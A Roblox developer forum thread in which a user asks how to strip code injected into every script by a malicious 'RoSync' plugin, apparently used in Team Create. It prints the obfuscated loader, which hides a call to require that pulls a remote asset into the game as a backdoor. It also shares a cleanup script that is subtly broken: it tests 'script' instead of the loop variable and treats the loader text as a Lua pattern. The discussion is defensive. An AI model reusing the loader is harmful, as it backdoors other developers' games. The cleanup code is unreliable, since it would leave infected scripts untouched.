Help! My game has gotten infected due to someone using a malicious plugin in TeamCreate

My entire game, has been infected with this “RoSync” plugin. I haven’t installed it, but I suspect someone in TC using the plugin.

I really need help to remove these fast. They are lagging my game out hardcore.

--[[ Last synced 10/28/2020 07:48 || RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5748048928)

That’s the code, I just need some way to clean this line of text out of all the scripts.

Model that’s being inserted. MeshLoader - Roblox

Ask the developers around this game on what plugins they are using. Make sure they survey each plugin and its owner. If the plugin’s owner is an alternate account, then it’s most likely the malicious plugin.

3 Likes

Thanks, I’ve contacted whoever owned it, and someone on discord provided a solution to remove all the malicious code aka @Megustral it needs to be ran in the command bar.

local maliciousCode = "insert malicious code here"
for _,scr in ipairs(game:GetDescendants()) do
  pcall(function()
    if not script:IsA("LuaSourceContainer") then return end
    scr.Source = string.gsub(scr.Source, maliciousCode , "")
  end)
end